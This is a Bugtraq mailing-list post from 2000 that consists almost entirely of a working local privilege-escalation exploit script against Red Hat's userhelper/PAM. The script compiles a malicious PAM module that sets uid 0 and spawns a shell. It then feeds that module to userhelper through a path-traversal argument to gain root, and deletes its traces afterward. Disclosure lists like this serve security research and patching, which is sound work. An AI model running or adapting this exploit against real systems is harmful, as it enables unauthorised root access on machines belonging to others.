Date: Wed, 5 Jan 2000 00:21:26 -0500 From: Derek Callaway <super@CE.NET> To: BUGTRAQ@SECURITYFOCUS.COM Subject: userhelper/PAM exploit #!/bin/sh # userrooter.sh by S <super@innu.org> # RedHat PAM/userhelper(8) exploit # Hi to inNUENdo! LAME=`rpm -qf /usr/sbin/userhelper | awk -F'-' '{print $2}' | awk -F'.' '{print $2}'` if [ $LAME -gt 15 ] then echo "Machine doesn't appear to be vulnerable :-\\" echo "Trying anyway..." fi cat << EOF >/tmp/hello-root.c #include<unistd.h> #include<stdlib.h> void pam_sm_authenticate(void){ setuid(0); puts("userrooter by S"); system("/bin/sh"); exit(EXIT_SUCCESS); } void pam_sm_setcred(void){ setuid(0); puts("userrooter by S"); system("/bin/sh"); exit(EXIT_SUCCESS); } EOF cat << EOF >/tmp/login #%PAM-1.0 auth required /tmp/pamper.so EOF gcc -shared -fPIC -O2 -o /tmp/pamper.so /tmp/hello-root.c rm /tmp/hello-root.c chmod 0700 /tmp/login /usr/sbin/userhelper -w ../../../tmp/login rm /tmp/pamper.so rm /tmp/login -- /* Derek Callaway <super@ce.net> char *sites[]={"http://www.geekwise.com", Programmer; CE Net, Inc. "http://www.freezersearch.com/index.cfm?aff=dhc", (302) 854-5440 Ext. 206 "http://www.homeworkhelp.org",0}; */
